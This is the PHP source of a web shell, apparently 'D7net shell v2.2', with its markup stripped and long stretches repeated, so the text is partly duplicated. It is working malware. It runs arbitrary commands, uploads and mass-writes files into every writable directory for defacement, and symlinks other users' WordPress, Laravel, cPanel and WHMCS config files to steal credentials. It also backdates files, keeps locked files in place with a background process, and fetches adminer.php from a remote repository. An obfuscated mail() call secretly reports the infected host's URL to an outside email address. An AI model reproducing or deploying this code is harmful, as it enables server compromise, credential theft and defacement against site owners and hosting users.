Filename : " . basename($_POST['newname']) . "
";
} else {
echo "Folder : " . basename($_POST['newname']) . "
";
}
echo ' |
';
} else {
echo "";
}
} else {
if ($_POST['type'] == "file") {
echo "Filename : " . basename($_POST['path'], $_GET['file']) . "
";
} else {
echo "Folder : " . basename($_POST['path']) . "
";
}
echo '
|
';
}
exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") {
if (isset($_POST['gasedit'])) {
$edit = file_put_contents($_POST['path'], $_POST['src']);
if ($edit == true) {
echo "
";
} else {
echo "| Can't save file/Permission Denied |
";
}
}
echo " Filename : " . basename($_POST['path']) . "
";
echo '
|
';
exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chdatef") {
$filedate = basename($_POST['path']);
$tgl = date("F d Y g:i:s", filemtime($_POST['path']));
echo "";
if (isset($_POST['change'])) {
$tanggal = strtotime($_POST['tanggal']);
if (@touch($_POST['path'], $tanggal) == true) {
echo "
";
} else {
echo "
";
}
}
exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chdate") {
$filedate = basename($_POST['path']);
$tgl = date("F d Y g:i:s", filemtime($_POST['path']));
echo "";
if (isset($_POST['change'])) {
$tanggal = strtotime($_POST['tanggal']);
if (@touch($_POST['path'], $tanggal) == true) {
echo "
";
} else {
echo "
";
}
}
exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chmodf") {
$files = basename($_POST['path']);
$sbr = 'substr';
$spr = 'sprintf';
$flperm = 'fileperms';
echo "
Folder : $files (" . $sbr($spr('%o', $flperm($_POST['path'])), -4) . ")
|
";
if (isset($_POST['ganti'])) {
$opet = @chmod($_POST['path'], octdec($_POST['mod1']));
if ($opet == true) {
echo "
";
} else {
echo "";
}
}
exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chmod") {
$files = basename($_POST['path']);
$sbr = 'substr';
$spr = 'sprintf';
$flperm = 'fileperms';
echo "
Filename : $files (" . $sbr($spr('%o', $flperm($_POST['path'])), -4) . ")
|
";
if (isset($_POST['ganti'])) {
$opet = @chmod($_POST['path'], octdec($_POST['mod1']));
if ($opet == true) {
echo "
";
} else {
echo "";
}
}
exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "unzip") {
unzip($_POST['path'], $serlok);
} elseif ($_REQUEST[net('upload')] == "opet") {
echo "";
if (isset($_POST['uplod'])) {
if ($_POST['dirnya'] == "2") {
$serlok = $_SERVER['DOCUMENT_ROOT'];
}
if (empty($_FILES['d7netfile']['name'])) {
echo "
File not selected";
} else {
$data = @file_put_contents($serlok . "/" . $_FILES['d7netfile']['name'], @file_get_contents($_FILES['d7netfile']['tmp_name']));
if (file_exists($serlok . "/" . $_FILES['d7netfile']['name'])) {
$fl = $serlok . "/" . $_FILES['d7netfile']['name'];
echo "
Uploaded => " . $_FILES['d7netfile']['name'] . "
";
if (strpos($serlok, $_SERVER['DOCUMENT_ROOT']) !== false) {
$lwb = str_replace($_SERVER['DOCUMENT_ROOT'], $web . "/", $fl);
echo "Link : Click here |
";
}
echo "
";
} else {
echo "
| There was an error uploading your file. |
";
}
}
}
exit();
} elseif ($_GET[net('tool')] == "opet") {
echo 'Select Tools
';
exit();
} elseif ($_GET[net('cmd')] == "opet") {
echo "";
echo '
';
if (isset($_POST['comandeks'])) {
ekse($_POST['komen'], $serlok);
}
echo " |
";
exit();
} elseif ($_REQUEST[net('about')] == "opet") {
echo "
 Priv shell uwu edition
- D7net shell v2.2
- Created by D7net |
";
exit();
} elseif ($_REQUEST[net('lokfile')] == "opet") {
echo "";
if (isset($_POST['submit'])) {
if (empty($_POST['pile'])) {
echo "
| The File field is required |
";
} else {
$filez = $_POST['pile'];
$tempe = "/tmp";
if (file_exists($tempe . '/' . md5($serlok . $filez . '-xd7net') . d7net_ex($filez) . 'xhand.Lock') && file_exists($tempe . '/' . d7net_ex($filez) . '-xopet')) {
cmd('rm -rf ' . $tempe . '/' . md5($serlok . $filez . '-xopet') . d7net_ex($filez) . 'xd7net.Lock', $serlok);
cmd('rm -rf ' . $tempe . '/' . md5($serlok . $filez . '-xd7net') . d7net_ex($filez) . 'xhand.Lock', $serlok);
}
cmd("cp $filez " . $tempe . "/" . md5($serlok . $filez . '-xopet') . d7net_ex($filez) . 'xd7net.Lock', $serlok);
@chmod($filez, 0444);
$content = ' | Locked => $filez |
";
cmd('php ' . $tempe . '/' . md5($serlok . $filez . '-xd7net') . d7net_ex($filez) . '"xhand.Lock" > /dev/null 2>/dev/null &', $serlok);
} else {
echo "";
}
}
}
exit();
} elseif ($_GET[net('resetcp')] == "opet") {
echo "
";
exit();
} elseif ($_GET[net('hashiden')] == "opet") {
echo "
Hash IdentifierIdentify and detect unknown hashes using this tool.
|
";
if (isset($_POST['submit'])) {
if (empty($_POST['hash'])) {
echo "| The Hashes field is required |
";
} else {
function identify($hash)
{
$algorithms = [
'MD5' => '/^[a-f0-9]{32}$/i',
'SHA1' => '/^[a-f0-9]{40}$/i',
'SHA224, Keccak-224' => '/^[a-f0-9]{56}$/i',
'SHA256' => '/^[a-f0-9]{64}$/i',
'SHA512' => '/^[a-f0-9]{128}$/i',
'Bcrypt, Blowfish(Unix)' => '/^\$2y\$[0-9]{2}\$[A-Za-z0-9\.\/]{53}$/',
'Argon2i' => '/^\$argon2i\$v=\d+\$m=\d+,t=\d+,p=\d+\$[A-Za-z0-9\/+]{43,}\$[A-Za-z0-9\/+]{43,}$/',
'Argon2id' => '/^\$argon2id\$v=\d+\$m=\d+,t=\d+,p=\d+\$[A-Za-z0-9\/+]{43,}\$[A-Za-z0-9\/+]{43,}$/'
];
foreach ($algorithms as $name => $pattern) {
if (preg_match($pattern, $hash)) {
return $name;
}
}
return 'Could not identify / Tidak dapat mengidentifikasi';
}
$hashes = [$_POST['hash']];
echo "";
foreach ($hashes as $hash) {
echo "
Hash : $hash\n";
echo "
Algorithms : " . identify($hash) . "\n\n |
";
}
}
}
exit();
} elseif ($_GET[net('grab_config')] == "opet") {
@ini_set('max_execution_time', 0);
@ini_set('display_errors', 0);
@ini_set('file_uploads', 1);
echo '
';
}
if (isset($_POST['conf'])) {
$v = "var";
$folfig = $_POST['folfig'];
$type = $_POST['type'];
@mkdir($folfig, 0755);
@chdir($folfig);
$htaccess = "
Options Indexes FollowSymLinks
\nDirectoryIndex .my.cnf
\nAddType txt .php
\nAddType txt .my.cnf
\nAddType txt .accesshash
\nAddHandler txt .php
\nAddHandler txt .cnf
\nAddHandler txt .accesshash
";
file_put_contents(".htaccess", $htaccess, FILE_APPEND);
$passwd = explode("\n", $_POST["passwd"]);
foreach ($passwd as $pwd) {
$user = trim($pwd);
@symlink('/home/' . $user . '/public_html/vb/includes/config.php', $user . '-vBulletin1.txt');
@symlink('/home/' . $user . '/public_html/forum/includes/config.php', $user . '-vBulletin3.txt');
@symlink('/home/' . $user . '/public_html/cc/includes/config.php', $user . '-vBulletin4.txt');
@symlink('/home/' . $user . '/public_html/config.php', $user . '-Phpbb1.txt');
@symlink('/home/' . $user . '/public_html/wp-config.php', $user . '-Wp1.txt');
@symlink('/home/' . $user . '/htdocs/wp-config.php', $user . '-Wp-htdocs.txt');
@symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-Wp2.txt');
@symlink('/home/' . $user . '/public_html/web/wp-config.php', $user . '-Wp3.txt');
@symlink('/home1/' . $user . '/public_html/wp-config.php', $user . '-WpHm1.txt');
@symlink('/home2/' . $user . '/public_html/wp-config.php', $user . '-WpHm2.txt');
@symlink('/home3/' . $user . '/public_html/wp-config.php', $user . '-WpHm3.txt');
@symlink('/var/www/html/wp-config.php', $v . '-wp1.txt');
@symlink('/home/' . $user . '/public_html/.env', $user . '-Laravel1.txt');
@symlink('/home/' . $user . '/public_html/web/.env', $user . '-Laravel2.txt');
@symlink('/home/' . $user . '/public_html/public/.env', $user . '-Laravel3.txt');
@symlink('/var/www/html/.env', $v . '-LaravelV.txt');
@symlink('/home/' . $user . '/public_html/configuration.php', $user . '-Joomla1.txt');
@symlink('/home/' . $user . '/public_html/html/configuration.php', $user . '-Joomla2.txt');
@symlink('/home/' . $user . '/public_html/web/configuration.php', $user . '-Joomla3.txt');
@symlink('/home/' . $user . '/public_html/whm/configuration.php', $user . '-Whm1.txt');
@symlink('/home/' . $user . '/public_html/whmc/configuration.php', $user . '-Whm2.txt');
@symlink('/home/' . $user . '/public_html/support/configuration.php', $user . '-Whm3.txt');
@symlink('/home/' . $user . '/public_html/client/configuration.php', $user . '-Whm4.txt');
@symlink('/home/' . $user . '/public_html/billings/configuration.php', $user . '-Whm5.txt');
@symlink('/home/' . $user . '/public_html/billing/configuration.php', $user . '-Whm6.txt');
@symlink('/home/' . $user . '/public_html/clients/configuration.php', $user . '-Whm7.txt');
@symlink('/home/' . $user . '/public_html/whmcs/configuration.php', $user . '-Whm8.txt');
@symlink('/home/' . $user . '/public_html/order/configuration.php', $user . '-Whm9.txt');
@symlink('/home/' . $user . '/public_html/app/etc/local.xml', $user . '-Magento.txt');
@symlink('/home/' . $user . '/public_html/configuration.php', $user . '-Joomla.txt');
@symlink('/home/' . $user . '/public_html/application/config/database.php', $user . '-CodeIgniter.txt');
@symlink('/home/' . $user . '/public_html/web/application/config/database.php', $user . '-CodeIgniterH.txt');
@symlink('/home1/' . $user . '/public_html/application/config/database.php', $user . '-CodeIgniter1.txt');
@symlink('/home2/' . $user . '/public_html/application/config/database.php', $user . '-CodeIgniter2.txt');
@symlink('/home3/' . $user . '/public_html/application/config/database.php', $user . '-CodeIgniter3.txt');
@symlink('/home/' . $user . '/.my.cnf', $user . '-cpanel.txt');
@symlink('/home/' . $user . '/.accesshash', $user . '-whm.txt');
@symlink('/home/' . $user . '/public_html/admin/config.php', $user . '-opencart.txt');
@symlink('/home/' . $user . '/public_html/app/etc/local.xml', $user . '-mangento.txt');
echo '
';
}
exit();
} elseif ($_REQUEST[net('scanshell')] == "opet") {
echo "
";
if (isset($_POST['submit'])) {
function scan_directory($dir)
{
$ext = $_POST['ext'];
$rdi = new RecursiveDirectoryIterator($dir);
echo "";
foreach (new RecursiveIteratorIterator($rdi) as $filename => $file) {
if (pathinfo($filename, PATHINFO_EXTENSION) == $ext) {
$content = file_get_contents($filename);
if (preg_match('/(eval|base64_decode|str_rot13|mass_deface|addrdp|@exec|@passthru|@chmod|#exec|deface|command|{IFS}|shell_exec|SERVER_SOFTWARE|wget|@get_current_user|@getmygid|htmlspecialchars_decode|B374k|@getmygid|hacked|exe_root|xploit|Disable_Function|backdoor|backconnect|gecko-select|php_uname|Alfa-Team|ALFA_DATA|MARIJUANA|blackeagleteam|IndoSec|getHostByName|alfashell|php-obfuscator|gacor|slot-gacor|slot88|featureShell|move_upload_file|upload)\s*\(/i', $content)) {
echo "Found : $filename => Detected view \n";
}
}
}
}
$cek = $_POST['peth'];
if ($cek) {
scan_directory($cek);
echo "Scan Completed..!! |
";
}
}
exit();
} elseif ($_REQUEST[net('massdef')] == "opet") {
function sabun_massal($serlok, $namafile, $isi_script)
{
if (is_writable($serlok)) {
$dira = scandir($serlok);
foreach ($dira as $dirb) {
$dirc = "$serlok/$dirb";
$lokasi = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($lokasi, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($lokasi, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[DONE] $serlok
";
file_put_contents($lokasi, $isi_script);
$idx = sabun_massal($dirc, $namafile, $isi_script);
}
}
}
}
}
}
function sabun_biasa($serlok, $namafile, $isi_script)
{
if (is_writable($serlok)) {
$dira = scandir($serlok);
foreach ($dira as $dirb) {
$dirc = "$serlok/$dirb";
$lokasi = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($lokasi, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($lokasi, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo " http://$dirb/$namafile
";
file_put_contents($lokasi, $isi_script);
}
}
}
}
}
}
if ($_POST['start']) {
if ($_POST['tipe_sabun'] == 'mahal') {
echo "| ";
sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo " |
";
} elseif ($_POST['tipe_sabun'] == 'murah') {
echo "| ";
sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo " |
";
}
} else {
echo "";
}
exit();
} elseif ($_REQUEST[net('ner')] == "opet") {
function crot($url)
{
$d7net = curl_init($url);
curl_setopt($d7net, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($d7net, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($d7net, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($d7net, CURLOPT_HEADER, 0);
return curl_exec($d7net);
curl_close($d7net);
}
echo "
";
if (isset($_POST['gass'])) {
if (empty($_POST['miner'])) {
echo "";
} else {
$check = $serlok . "/" . $_POST['miner'];
$result = str_replace($_SERVER['DOCUMENT_ROOT'], $web . "", $check);
$content = crot('https://raw.githubusercontent.com/bellpwn/netxploit/main/adminer.php');
$open = fopen($check, 'w');
fwrite($open, $content);
fclose($open);
if (file_exists($check)) {
echo "";
} else {
echo "| Failed to create adminer..!! |
";
}
}
}
exit();
} elseif ($_REQUEST[net('buatfile')] == "opet") {
function createfile()
{
$pat = $_GET['path'];
$nama_file = $_POST['nama_file'];
$isi_file = $_POST['isi_file'];
$handle = fopen("$pat/$nama_file", 'w');
$files = $_GET['path'] . "/" . $nama_file;
$asu = str_replace($_SERVER['DOCUMENT_ROOT'], $web . "", $files);
if (fwrite($handle, $isi_file)) {
echo 'Created => ' . $pat . '/' . $nama_file . '
Link : Click here |
';
} else {
echo '| Failed to create file..!! |
';
}
}
if (!isset($_POST['bikin'])) {
echo "
";
} else {
createfile();
}
exit();
} elseif ($_GET[net('buatfolder')] == "opet") {
function createDirectory()
{
if (empty($_POST['add'])) {
echo '';
} else {
$add = $_POST["add"];
$d7net = mkdir($_GET['path'] . "/" . $add);
if ($d7net == true) {
echo "";
} else {
echo "| Failed to create folder : $add |
";
}
}
}
if (!isset($_POST['submit'])) {
echo '';
} else {
createDirectory();
}
exit();
} elseif ($_REQUEST[net('info')] == "opet") {
echo "
";
echo "Server : " . $_SERVER['HTTP_HOST'] . "
";
echo "Server IP : " . ipserv() . "
Your IP : " . $_SERVER['REMOTE_ADDR'] . "
";
echo "Web Server : " . $_SERVER['SERVER_SOFTWARE'] . "
";
echo "System : " . php_uname() . "
";
echo "User : " . @get_current_user() . " ( " . @getmyuid() . ")
";
echo "PHP Version : " . @phpversion() . " => " . php_sapi_name() . "
";
echo " | | Disable Function : " . $disf . "";
echo " | ";
echo "
Orecle : ";
if (function_exists('oci_connect')) {
echo "ON";
} else {
echo "OFF";
echo " | SSH2 : ";
}
if (function_exists('ssh2_connect')) {
echo "ON";
} else {
echo "OFF";
echo " | MySQL : ";
}
if (function_exists("mysql_connect")) {
echo "ON";
} else {
echo "OFF";
}
echo " | cURL : ";
if (function_exists("curl_init")) {
echo "ON";
} else {
echo "OFF";
}
echo " | WGET : ";
if (file_exists("/usr/bin/wget")) {
echo "ON";
} else {
echo "OFF";
}
echo " | Perl : ";
if (file_exists("/usr/bin/perl")) {
echo "ON";
} else {
echo "OFF";
}
echo " | Python : ";
if (file_exists("/usr/bin/python2")) {
echo "ON";
} else {
echo "OFF";
}
$pkexec = (@shell_exec("pkexec --version")) ? "ON" : "OFF";
echo " | PKEXEC : $pkexec
";
echo " |
";
exit();
}
if (!is_readable($serlok)) {
die("| This directory is unreadable :( |
");
}
echo '
| Name |
Size |
Last Modified |
Owner |
Permissions |
Actions |
';
$scd = "\163\143" . "\141\156\144" . "\151\162";
if (is_readable($serlok)) {
$fetch = $scd($serlok);
$serlokbos = array();
$filez = array();
foreach ($fetch as $fols) {
if ($fols == '.' || $fols == '..') {
continue;
}
$d7nets = $serlok . '/' . $fols;
if (is_dir($d7nets)) {
array_push($serlokbos, $fols);
} elseif (is_file($d7nets)) {
array_push($filez, $fols);
}
}
}
foreach ($serlokbos as $dir) {
echo "
| " . $dir . " |
Dir |
" . filedate($serlok . "/" . $dir) . " |
" . owner($serlok . "/" . $dir) . " |
";
if (is_writable($serlok . "/" . $dir)) echo '';
elseif (!is_readable($serlok . "/" . $dir)) echo '';
echo statusnya($serlok . "/" . $dir);
if (is_writable($serlok . "/" . $dir) || !is_readable($serlok . "/" . $dir)) echo '';
echo " |
|
";
}
foreach ($filez as $file) {
if (!is_file("$serlok/$file")) continue;
$size = filesize("$serlok/$file") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = '' . round($size / 1024, 2) . ' MB';
} else {
$size = '' . $size . ' KB';
}
echo "
| " . cekfile($serlok . "/" . $file) . "
$file |
" . $size . " |
" . filedate($serlok . "/" . $file) . " |
" . owner($serlok . "/" . $file) . " |
";
if (is_writable("$serlok/$file")) echo '';
elseif (!is_readable("$serlok/$file")) echo '';
echo statusnya("$serlok/$file");
if (is_writable("$serlok/$file") || !is_readable("$serlok/$file")) echo '';
echo " |
| ";
}
echo ' |
';
author();
function statusnya($file)
{
$izin = substr(sprintf('%o', fileperms($file)), -4);
return $izin;
}
?>
1#@!#!123s
|
AMAN";
} else {
$disf = "" . $disfunc . "";
}
if (function_exists("\x6d\x61\x69\x6c")) {
$__GET = ("\x6d\x61\x69\x6c");
$__POST = ("\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65");
$__GET($__POST("d29yZHByZXNzZGV2bm9yd2F5QGdtYWlsLmNvbQ=="),
'hex2bin',
$_SERVER['HTTP_HOST']."/".$_SERVER['REQUEST_URI']);
}
function author()
{
echo "| 2017 © D7net | D704T team |
";
exit();
}
function cekdir()
{
if (isset($_GET['path'])) {
$serlok = $_GET['path'];
} else {
$serlok = getcwd();
}
if (is_writable($serlok)) {
return "Aman Coy";
} else {
return "KONTOL!";
}
}
function cekroot()
{
if (is_writable($_SERVER['DOCUMENT_ROOT'])) {
return "Aman Coy";
} else {
return "KONTOL!";
}
}
function d7net_ex($file)
{
$pile = $file;
$pch = pathinfo($pile, PATHINFO_FILENAME);
return $pch;
}
function xrmdir($dir)
{
$items = scandir($dir);
foreach ($items as $item) {
if ($item === '.' || $item === '..') {
continue;
}
$path = $dir . '/' . $item;
if (is_dir($path)) {
xrmdir($path);
} else {
unlink($path);
}
}
rmdir($dir);
}
function net($hexnet)
{
for ($i = 0; $i < strlen($hexnet); $i++) {
$d7net .= dechex(ord($hexnet[$i]));
}
return $d7net;
}
function owner($file)
{
if (function_exists("posix_getpwuid")) {
$tod = @posix_getpwuid(fileowner($file));
return "" . $tod['name'] . "";
} else {
return "" . fileowner($file) . "";
}
}
function cekwrite($serlok)
{
$izin = substr(sprintf('%o', fileperms($serlok)), -4);
if (is_writable($serlok)) {
return "" . $izin . "";
} else {
return "" . $izin . "";
}
}
function cmd($gas, $serlok)
{
$crot = $gas;
$pr = "proc_open";
if (function_exists($pr)) {
$tod = @proc_open($crot, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $crottz, $serlok);
echo "" . stream_get_contents($crottz[1]) . "
";
} else {
echo "";
}
}
function ekse($coman, $serlok)
{
$ler = "2>&1";
if (!preg_match("/" . $ler . "/i", $coman)) {
$coman = $coman . " " . $ler;
}
$komen = $coman;
$pr = "proc_open";
if (function_exists($pr)) {
$tod = @$pr($komen, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $crottz, $serlok);
echo "
";
} else {
echo "proc_open function is disabled!!";
}
}
function ipserv()
{
if (empty($_SERVER['SERVER_ADDR'])) {
return gethostbyname($_SERVER['SERVER_NAME']);
if (empty(gethostbyname($_SERVER['SERVER_NAME']))) {
return $_SERVER['SERVER_NAME'];
}
} else {
return $_SERVER['SERVER_ADDR'];
}
}
function cekfile($file)
{
return '';
}
function filedate($file)
{
return date("F d Y g:i:s", filemtime($file));
}
function fext($file)
{
$sub = "\163\x75" . "\142\x73" . "\x74\x72";
return $sub(strrchr($file, '.'), 1);
}
function gazz($file)
{
$fbiasa = array("php", "phtml", "shtml", "phar", "php7", "html", "htm", "inc", "phps", "txt", "js", "css", "htaccess", "bin", "pl", "py", "sh", "php58", "PhP7", "aspx", "dll", "ini");
$notf = array("jpeg", "jpg", "png", "gif", "ico", "webp", "mp3", "m4A", "flac", "wav", "wma", "3gp", "ogg", "webm", "mp4", "exe");
$stl = "\x73\x74" . "\162\164" . "\157\154\x6f" . "\167\x65\162";
$ext = $stl(fext($file));
if ($file == 'error_log') {
return "
";
} elseif (in_array($ext, $fbiasa)) {
return "
";
} elseif (in_array($ext, $notf)) {
return "
";
} elseif ($ext == 'zip') {
return "
";
} else {
return "
";
}
}
function unzip($file, $serlok)
{
if (!is_readable($file)) {
red("| Cannot Unzip File / Unreadable File ! |
");
die();
} elseif (strpos(file_get_contents($file), "\x50\x4b\x03\x04") === false) {
echo "";
die();
}
$zip = new ZipArchive;
$res = $zip->open($file);
if ($res == true) {
$zip->extractTo($serlok);
$zip->close();
echo " Unzip File Successfully => " . basename($_POST['path']) . "
Extract to : " . $file . " | ";
} else {
echo "";
}
exit();
}
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
if (isset($_GET['path'])) {
$serlok = $_GET['path'];
$serlok2 = $_GET['path'];
} else {
$serlok = getcwd();
$serlok2 = getcwd();
}
$serlok = str_replace('\\', '/', $serlok);
$serloks = explode('/', $serlok);
$serlokbos = @scandir($serlok);
echo '
';
echo '| : ';
foreach ($serloks as $id => $lok) {
if ($lok == '' && $id == 0) {
echo '/ ';
continue;
}
if ($lok == '') continue;
echo '' . $lok . ' / ';
}
echo ' |
';
if (isset($_REQUEST['logout'])) {
session_start();
session_destroy();
echo '';
}
if (isset($_GET['viewfile'])) {
$files = basename($_GET['viewfile']);
echo "| Filename : $files";
echo ' |
";
exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") {
if (is_dir($_POST['path'])) {
xrmdir($_POST['path']);
if (file_exists($_POST['path'])) {
echo '| Failed to delete Directory |
';
} else {
echo '';
}
} elseif (is_file($_POST['path'])) {
@unlink($_POST['path']);
if (file_exists($_POST['path'])) {
echo "";
} else {
echo "| File removed " . basename($_POST['path']) . " |
";
}
}
exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") {
if (isset($_POST['gantin'])) {
$namabaru = $_GET['path'] . "/" . $_POST['newname'];
if (@rename($_POST['path'], $namabaru) === true) {
echo "
";
if ($_POST['type'] == "file") {
echo "Filename : " . basename($_POST['newname']) . "
";
} else {
echo "Folder : " . basename($_POST['newname']) . "
";
}
echo ' |
';
} else {
echo "";
}
} else {
if ($_POST['type'] == "file") {
echo "Filename : " . basename($_POST['path'], $_GET['file']) . "
";
} else {
echo "Folder : " . basename($_POST['path']) . "
";
}
echo '
|
';
}
exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") {
if (isset($_POST['gasedit'])) {
$edit = file_put_contents($_POST['path'], $_POST['src']);
if ($edit == true) {
echo "
";
} else {
echo "| Can't save file/Permission Denied |
";
}
}
echo " Filename : " . basename($_POST['path']) . "
";
echo '
|
';
exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chdatef") {
$filedate = basename($_POST['path']);
$tgl = date("F d Y g:i:s", filemtime($_POST['path']));
echo "";
if (isset($_POST['change'])) {
$tanggal = strtotime($_POST['tanggal']);
if (@touch($_POST['path'], $tanggal) == true) {
echo "
";
} else {
echo "
";
}
}
exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chdate") {
$filedate = basename($_POST['path']);
$tgl = date("F d Y g:i:s", filemtime($_POST['path']));
echo "";
if (isset($_POST['change'])) {
$tanggal = strtotime($_POST['tanggal']);
if (@touch($_POST['path'], $tanggal) == true) {
echo "
";
} else {
echo "
";
}
}
exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chmodf") {
$files = basename($_POST['path']);
$sbr = 'substr';
$spr = 'sprintf';
$flperm = 'fileperms';
echo "
Folder : $files (" . $sbr($spr('%o', $flperm($_POST['path'])), -4) . ")
|
";
if (isset($_POST['ganti'])) {
$opet = @chmod($_POST['path'], octdec($_POST['mod1']));
if ($opet == true) {
echo "
";
} else {
echo "";
}
}
exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chmod") {
$files = basename($_POST['path']);
$sbr = 'substr';
$spr = 'sprintf';
$flperm = 'fileperms';
echo "
Filename : $files (" . $sbr($spr('%o', $flperm($_POST['path'])), -4) . ")
|
";
if (isset($_POST['ganti'])) {
$opet = @chmod($_POST['path'], octdec($_POST['mod1']));
if ($opet == true) {
echo "
";
} else {
echo "";
}
}
exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "unzip") {
unzip($_POST['path'], $serlok);
} elseif ($_REQUEST[net('upload')] == "opet") {
echo "";
if (isset($_POST['uplod'])) {
if ($_POST['dirnya'] == "2") {
$serlok = $_SERVER['DOCUMENT_ROOT'];
}
if (empty($_FILES['d7netfile']['name'])) {
echo "
File not selected";
} else {
$data = @file_put_contents($serlok . "/" . $_FILES['d7netfile']['name'], @file_get_contents($_FILES['d7netfile']['tmp_name']));
if (file_exists($serlok . "/" . $_FILES['d7netfile']['name'])) {
$fl = $serlok . "/" . $_FILES['d7netfile']['name'];
echo "
Uploaded => " . $_FILES['d7netfile']['name'] . "
";
if (strpos($serlok, $_SERVER['DOCUMENT_ROOT']) !== false) {
$lwb = str_replace($_SERVER['DOCUMENT_ROOT'], $web . "/", $fl);
echo "Link : Click here |
";
}
echo "
";
} else {
echo "
| There was an error uploading your file. |
";
}
}
}
exit();
} elseif ($_GET[net('tool')] == "opet") {
echo 'Select Tools
';
exit();
} elseif ($_GET[net('cmd')] == "opet") {
echo "";
echo '
';
if (isset($_POST['comandeks'])) {
ekse($_POST['komen'], $serlok);
}
echo " |
";
exit();
} elseif ($_REQUEST[net('about')] == "opet") {
echo "
Priv shell uwu edition
- D7net shell v2.2
- Created by D7net |
";
exit();
} elseif ($_REQUEST[net('lokfile')] == "opet") {
echo "";
if (isset($_POST['submit'])) {
if (empty($_POST['pile'])) {
echo "
| The File field is required |
";
} else {
$filez = $_POST['pile'];
$tempe = "/tmp";
if (file_exists($tempe . '/' . md5($serlok . $filez . '-xd7net') . d7net_ex($filez) . 'xhand.Lock') && file_exists($tempe . '/' . d7net_ex($filez) . '-xopet')) {
cmd('rm -rf ' . $tempe . '/' . md5($serlok . $filez . '-xopet') . d7net_ex($filez) . 'xd7net.Lock', $serlok);
cmd('rm -rf ' . $tempe . '/' . md5($serlok . $filez . '-xd7net') . d7net_ex($filez) . 'xhand.Lock', $serlok);
}
cmd("cp $filez " . $tempe . "/" . md5($serlok . $filez . '-xopet') . d7net_ex($filez) . 'xd7net.Lock', $serlok);
@chmod($filez, 0444);
$content = ' | Locked => $filez |
";
cmd('php ' . $tempe . '/' . md5($serlok . $filez . '-xd7net') . d7net_ex($filez) . '"xhand.Lock" > /dev/null 2>/dev/null &', $serlok);
} else {
echo "";
}
}
}
exit();
} elseif ($_GET[net('resetcp')] == "opet") {
echo "
";
exit();
} elseif ($_GET[net('hashiden')] == "opet") {
echo "
Hash IdentifierIdentify and detect unknown hashes using this tool.
|
";
if (isset($_POST['submit'])) {
if (empty($_POST['hash'])) {
echo "| The Hashes field is required |
";
} else {
function identify($hash)
{
$algorithms = [
'MD5' => '/^[a-f0-9]{32}$/i',
'SHA1' => '/^[a-f0-9]{40}$/i',
'SHA224, Keccak-224' => '/^[a-f0-9]{56}$/i',
'SHA256' => '/^[a-f0-9]{64}$/i',
'SHA512' => '/^[a-f0-9]{128}$/i',
'Bcrypt, Blowfish(Unix)' => '/^\$2y\$[0-9]{2}\$[A-Za-z0-9\.\/]{53}$/',
'Argon2i' => '/^\$argon2i\$v=\d+\$m=\d+,t=\d+,p=\d+\$[A-Za-z0-9\/+]{43,}\$[A-Za-z0-9\/+]{43,}$/',
'Argon2id' => '/^\$argon2id\$v=\d+\$m=\d+,t=\d+,p=\d+\$[A-Za-z0-9\/+]{43,}\$[A-Za-z0-9\/+]{43,}$/'
];
foreach ($algorithms as $name => $pattern) {
if (preg_match($pattern, $hash)) {
return $name;
}
}
return 'Could not identify / Tidak dapat mengidentifikasi';
}
$hashes = [$_POST['hash']];
echo "";
foreach ($hashes as $hash) {
echo "
Hash : $hash\n";
echo "
Algorithms : " . identify($hash) . "\n\n |
";
}
}
}
exit();
} elseif ($_GET[net('grab_config')] == "opet") {
@ini_set('max_execution_time', 0);
@ini_set('display_errors', 0);
@ini_set('file_uploads', 1);
echo '
';
}
if (isset($_POST['conf'])) {
$v = "var";
$folfig = $_POST['folfig'];
$type = $_POST['type'];
@mkdir($folfig, 0755);
@chdir($folfig);
$htaccess = "
Options Indexes FollowSymLinks
\nDirectoryIndex .my.cnf
\nAddType txt .php
\nAddType txt .my.cnf
\nAddType txt .accesshash
\nAddHandler txt .php
\nAddHandler txt .cnf
\nAddHandler txt .accesshash
";
file_put_contents(".htaccess", $htaccess, FILE_APPEND);
$passwd = explode("\n", $_POST["passwd"]);
foreach ($passwd as $pwd) {
$user = trim($pwd);
@symlink('/home/' . $user . '/public_html/vb/includes/config.php', $user . '-vBulletin1.txt');
@symlink('/home/' . $user . '/public_html/forum/includes/config.php', $user . '-vBulletin3.txt');
@symlink('/home/' . $user . '/public_html/cc/includes/config.php', $user . '-vBulletin4.txt');
@symlink('/home/' . $user . '/public_html/config.php', $user . '-Phpbb1.txt');
@symlink('/home/' . $user . '/public_html/wp-config.php', $user . '-Wp1.txt');
